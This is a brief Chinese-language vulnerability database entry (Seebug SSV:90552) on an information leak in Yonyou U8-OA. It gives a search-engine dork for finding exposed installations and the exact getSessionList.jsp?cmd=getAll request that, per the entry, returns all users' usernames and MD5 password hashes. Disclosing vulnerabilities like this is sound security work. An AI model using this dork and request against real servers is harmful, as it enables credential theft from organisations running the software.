用友oa getSessionList.jsp信息泄露

2016-01-21T00:00:00
ID SSV:90552
Type seebug
Reporter nnnn
Modified 2016-01-21T00:00:00

Description

https://g.jiuminghu.com/#newwindow=1&q=intitle:%E3%80%8A%E7%94%A8%E5%8F%8BU8-OA%E3%80%8B&btnK=+%E6%90%9C%E7%B4%A2

intitle:《用友U8-OA》

谷歌搜索即可搜出来大量案例

漏洞存在于:http://www.example.com/yyoa/ext/https/getSessionList.jsp?cmd=getAll

该漏洞允许攻击者获取所有用户的用户名和密码MD5值